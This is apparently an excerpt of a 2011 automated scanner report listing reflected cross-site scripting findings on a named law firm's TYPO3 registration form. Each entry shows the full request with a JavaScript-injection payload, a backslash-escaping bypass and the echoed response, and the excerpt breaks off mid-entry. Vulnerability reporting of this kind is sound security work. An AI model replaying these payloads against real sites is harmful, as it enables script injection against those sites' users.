   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
users_form','FE[fe_users][status]','');
   updateForm('fe_users_form','FE[fe_users][title]','3');
   updateForm('fe_users_form','FE[fe_users][zip]','3');
   updateForm('fe_users_form','FE[fe_users][city]','321752\\';alert(1)//21ef1916b41');
   updateForm('fe_users_form','FE[fe_users][zone]','AL');
   updateForm('fe_users_form','FE[fe_users][static_info_country]','AFG');
   updateForm('fe_users_form','FE[fe_users][country]','');
   updateForm(
...[SNIP]...
4.174. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bcompany%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bcompany%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ece68\'%3balert(1)//0b41804b4b8 was submitted in the FE%5Bfe_users%5D%5Bcompany%5D parameter. This input was echoed as ece68\\';alert(1)//0b41804b4b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3ece68\'%3balert(1)//0b41804b4b8&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:25:35 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
form','FE[fe_users][language]','');
   updateForm('fe_users_form','FE[fe_users][comments]','');
   updateForm('fe_users_form','FE[fe_users][www]','');
   updateForm('fe_users_form','FE[fe_users][company]','3ece68\\';alert(1)//0b41804b4b8');
   updateForm('fe_users_form','FE[fe_users][image]','');
   updateForm('fe_users_form','FE[fe_users][disable]','0');
   updateForm('fe_users_form','FE[fe_users][date_of_birth]','');
   updateForm('fe_users
...[SNIP]...
4.175. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bemail%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bemail%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7283e\'%3balert(1)//d945f4f3b76 was submitted in the FE%5Bfe_users%5D%5Bemail%5D parameter. This input was echoed as 7283e\\';alert(1)//d945f4f3b76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com7283e\'%3balert(1)//d945f4f3b76&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:25:54 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27504

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
address]','3');
   updateForm('fe_users_form','FE[fe_users][telephone]','');
   updateForm('fe_users_form','FE[fe_users][fax]','');
   updateForm('fe_users_form','FE[fe_users][email]','netsparker@example.com7283e\\';alert(1)//d945f4f3b76');
   updateForm('fe_users_form','FE[fe_users][gender]','0');
   updateForm('fe_users_form','FE[fe_users][first_name]','');
   updateForm('fe_users_form','FE[fe_users][last_name]','');
   updateForm('fe_users
...[SNIP]...
4.176. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bgender%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bgender%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1afa4\'%3balert(1)//fd66386815e was submitted in the FE%5Bfe_users%5D%5Bgender%5D parameter. This input was echoed as 1afa4\\';alert(1)//fd66386815e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=01afa4\'%3balert(1)//fd66386815e&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:06 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
[telephone]','');
   updateForm('fe_users_form','FE[fe_users][fax]','');
   updateForm('fe_users_form','FE[fe_users][email]','netsparker@example.com');
   updateForm('fe_users_form','FE[fe_users][gender]','01afa4\\';alert(1)//fd66386815e');
   updateForm('fe_users_form','FE[fe_users][first_name]','');
   updateForm('fe_users_form','FE[fe_users][last_name]','');
   updateForm('fe_users_form','FE[fe_users][alias]','');
   updateForm('fe_users_f
...[SNIP]...
4.177. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bpassword%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bpassword%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e75e\'%3balert(1)//0f9cda18802 was submitted in the FE%5Bfe_users%5D%5Bpassword%5D parameter. This input was echoed as 7e75e\\';alert(1)//0f9cda18802 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=37e75e\'%3balert(1)//0f9cda18802&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:15 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27255

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
<![CDATA[*/
   updateForm('fe_users_form','FE[fe_users][username]','RonaldSmith');
   updateForm('fe_users_form','FE[fe_users][password]','37e75e\\';alert(1)//0f9cda18802');
   updateForm('fe_users_form','FE[fe_users][usergroup][]','1');
   updateForm('fe_users_form','FE[fe_users][name]','');
   updateForm('fe_users_form','FE[fe_users][address]','3');
   updateForm('fe_users_f
...[SNIP]...
4.178. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bpassword_again%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bpassword_again%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b60b0\'%3balert(1)//10f8d4d5446 was submitted in the FE%5Bfe_users%5D%5Bpassword_again%5D parameter. This input was echoed as b60b0\\';alert(1)//10f8d4d5446 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3b60b0\'%3balert(1)//10f8d4d5446&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:25 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27309

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
teForm('fe_users_form','FE[fe_users][module_sys_dmail_html]','');
   updateForm('fe_users_form','FE[fe_users][tx_pdmylibrary_news_user]','');
   updateForm('fe_users_form','FE[fe_users][password_again]','3b60b0\\';alert(1)//10f8d4d5446');
   updateForm('fe_users_form','FE[fe_users][0]','\'"-->
...[SNIP]...
4.179. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bstatic_info_country%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bstatic_info_country%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ccd4\'%3balert(1)//f8c734f430 was submitted in the FE%5Bfe_users%5D%5Bstatic_info_country%5D parameter. This input was echoed as 4ccd4\\';alert(1)//f8c734f430 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG4ccd4\'%3balert(1)//f8c734f430&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:34 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27243

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
fe_users][zip]','3');
   updateForm('fe_users_form','FE[fe_users][city]','3');
   updateForm('fe_users_form','FE[fe_users][zone]','AL');
   updateForm('fe_users_form','FE[fe_users][static_info_country]','AFG4ccd4\\';alert(1)//f8c734f430');
   updateForm('fe_users_form','FE[fe_users][country]','');
   updateForm('fe_users_form','FE[fe_users][language]','');
   updateForm('fe_users_form','FE[fe_users][comments]','');
   updateForm('fe_users_fo
...[SNIP]...
4.180. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Btitle%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Btitle%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 107b8\'%3balert(1)//d84ea8e71ea was submitted in the FE%5Bfe_users%5D%5Btitle%5D parameter. This input was echoed as 107b8\\';alert(1)//d84ea8e71ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3107b8\'%3balert(1)//d84ea8e71ea&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:43 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
_form','FE[fe_users][last_name]','');
   updateForm('fe_users_form','FE[fe_users][alias]','');
   updateForm('fe_users_form','FE[fe_users][status]','');
   updateForm('fe_users_form','FE[fe_users][title]','3107b8\\';alert(1)//d84ea8e71ea');
   updateForm('fe_users_form','FE[fe_users][zip]','3');
   updateForm('fe_users_form','FE[fe_users][city]','3');
   updateForm('fe_users_form','FE[fe_users][zone]','AL');
   updateForm('fe_users_form','FE[
...[SNIP]...
4.181. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Busername%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

